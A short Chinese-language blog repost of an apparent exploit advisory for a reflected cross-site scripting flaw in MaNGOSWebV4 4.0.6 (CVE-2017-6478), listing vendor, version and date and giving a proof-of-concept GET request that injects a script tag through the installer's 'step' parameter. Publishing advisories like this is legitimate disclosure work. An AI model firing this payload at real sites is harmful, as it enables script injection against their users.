MaNGOSWebV4 4.0.6 反射型XSS漏洞技术详情

本文详细介绍了MaNGOSWebV4 4.0.6版本中存在的反射型跨站脚本(XSS)安全漏洞,包括其CVE编号、影响版本、验证概念(PoC)以及具体的触发方式。

漏洞标题:MaNGOSWebV4 4.0.6 - 反射型XSS

日期:2024-10-26

漏洞作者:CodeSecLab

厂商主页:https://github.com/paintballrefjosh/MaNGOSWebV4

软件链接:https://github.com/paintballrefjosh/MaNGOSWebV4

版本:4.0.6

测试环境:Ubuntu Windows

CVE:CVE-2017-6478

PoC: // 访问易受攻击的URL并触发XSS载荷 GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E

[替换你的域名] 复制

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次